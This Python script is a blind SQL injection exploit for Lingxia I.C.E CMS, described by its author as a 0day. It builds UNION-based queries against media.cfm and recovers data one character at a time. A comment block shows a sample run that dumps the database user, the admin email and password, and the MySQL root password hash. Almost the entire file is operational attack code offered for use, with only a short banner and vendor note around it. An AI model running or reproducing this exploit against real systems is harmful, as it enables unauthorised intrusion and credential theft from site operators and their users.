#!/usr/bin/python
# ICE CMS Blind SQLi 0day.
# [mr_me@pluto ice]$ python icecold.py -p localhost:8080 -t 10.3.100.25:8500 -d /ice/
# 
# 	| ---------------------------------------------------- |
# 	| Lingxia I.C.E CMS Remote Blind SQL Injection Exploit |
# 	| by mr_me - net-ninja.net --------------------------- |
#
# (+) Exploiting target @: 10.3.100.25:8500/ice/
# (+) Testing Proxy @ localhost:8080..
# (+) Proxy is working!
# (+) Using string 'icon_media_remove.gif' for the true page
# (+) This will take time, go grab a coffee..
#
# (!) Getting database version: 5.5.9
# (!) Getting database user: root@localhost
# (!) Getting database name: ice
# (!) Getting ICE administrative account: admin@admin.com:pa$sw0rD
# (!) w00t! You have access to MySQL database!
# (+) Dumping hashs hold onto your knickers..
# (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
# (+) PoC finished.
#
# Note to Lingexa:
# Next time, acknowledge a kind email.

import sys, urllib, re
from optparse import OptionParser

# all possible decimal values of printable ascii characters
# 8 requests per char, much much cleaner.
lower_value = 0
upper_value = 126
#global truStr
trueStr = "icon_media_remove.gif"

vuluri = "media.cfm?session.current_site_id=1&session.user_id=99"
basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'}

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.2.15:8500 -d /amoeba/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")

(options, args) = parser.parse_args()

def banner():
    print "\n\t| ---------------------------------------------------- |"
    print "\t| Lingxia I.C.E CMS Remote Blind SQL Injection Exploit |"
    print "\t| by mr_me - net-ninja.net --------------------------- |\n"

if len(sys.argv) < 5:
	banner()
	parser.print_help()
	sys.exit(1)

def setTargetHTTP():
	if options.target[0:7] != 'http://':
		options.target = "http://" + options.target
	return options.target
	
def getProxy():
	try:
		proxy = {'http': "http://"+options.proxy}
		opener = urllib.FancyURLopener(proxy)
	except(socket.timeout):
		print "\n(-) Proxy Timed Out"
		sys.exit(1)
	except(),msg:
		print "\n(-) Proxy Failed"
		sys.exit(1)
	return opener
	
def getServerResponse(exploit):
	if options.proxy:
		try:
			options.target = setTargetHTTP()
			opener = getProxy()
			check = opener.open(options.target+options.directory+exploit).read()
		except urllib.error.HTTPError, error:
			check = error.read()
		except socket.error:
			print "(-) Proxy connection failed"
			sys.exit(1)
	else:
		try:
			check = urllib.urlopen(options.target+options.directory+exploit).read()
		except urllib.error.HTTPError, error:
			check = error.read()
		except urllib.error.URLError:
			print "(-) Target connection failed, check your address"
			sys.exit(1)
	return check

# modified version of rsauron's function 
# thanks bro. 
def getAsciiValue(URI):
	lower = lower_value
        upper = upper_value
	while lower < upper:
		try:
			mid = (lower + upper) / 2
			head_URI = URI + ">"+str(mid)+"+--"
			result = getServerResponse(head_URI)
			match = re.findall(trueStr,result)
			if len(match) >= 1:
			        lower = mid + 1
			else:
                             	upper = mid
		except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                       	pass

	if lower > lower_value and lower < upper_value:
                value = lower
        else:
             	head_URI = URI + "="+str(lower)
		result = getServerResponse(head_URI)
                match = re.findall(trueStr,result)
                if len(match) >= 1:
                        value = lower
                else:
                        print "(-) READ xprog's blind sql tutorial!\n"
                        sys.exit(1)
        return value

def doBlindSqlInjection():
	print "(+) Using string '%s' for the true page" % (trueStr)
        print "(+) This will take time, go grab a coffee.."
        for key in basicInfo:
	        sys.stdout.write("\n(!) Getting database %s: " % (key))
                sys.stdout.flush()

                # it will never go through all 100 iterations
                for i in range(1,100):
                        request = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i)))
           		asciival = getAsciiValue(request)
                        if asciival != 0:
                                sys.stdout.write("%s" % (chr(asciival)))
                                sys.stdout.flush()
                        else:
                             	break
	
	sys.stdout.write("\n(!) Getting ICE administrative account: ")
	sys.stdout.flush()
	for i in range(1,100):
		getUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat"
		"(email,0x3a,pword)+from+ice.ice_user+limit+0,1),%s,1))" % str(i))

		asciival = getAsciiValue(getUserAndPass)
		
		if asciival != 0:
			sys.stdout.write("%s" % (chr(asciival)))
			sys.stdout.flush()
		else:
			pass
		
	isMysqlUser = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+(select 1 from mysql.user limit 0,1)=1")
        result = getServerResponse(isMysqlUser)
        match = re.findall(trueStr,result)
        if len(match) >= 1:
               	print "\n(!) w00t! You have access to MySQL database!"
                print "(+) Dumping hashs hold onto your knickers.."
                sys.stdout.write("(+) The username and hashed password is: ")
                sys.stdout.flush()
                for k in range(1,100):
                       	getMysqlUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat"
			"(user,0x3a,password)+from+mysql.user+limit+0,1),%s,1))" % str(k))
                        asciival = getAsciiValue(getMysqlUserAndPass)
                        if asciival != 0:
                                sys.stdout.write("%s" % (chr(asciival)))
                               	sys.stdout.flush()
                        else:
                                break
        else:
                print "\n(-) You do not have access to MySQL database"

if __name__ == "__main__":
	banner()
	print "(+) Exploiting target @: %s" % (options.target+options.directory)
	if options.proxy:
		print "(+) Testing Proxy @ %s.." % (options.proxy)
		opener = getProxy()
		try:
			check = opener.open("http://www.google.com").read()
		except:
			check = 0
			pass
		if check >= 1:
			print "(+) Proxy is working!"
		
		else:
			print "(-) Proxy failed, exiting.."
			sys.exit(1)

	doBlindSqlInjection()	
	print "\n(+) PoC finished."
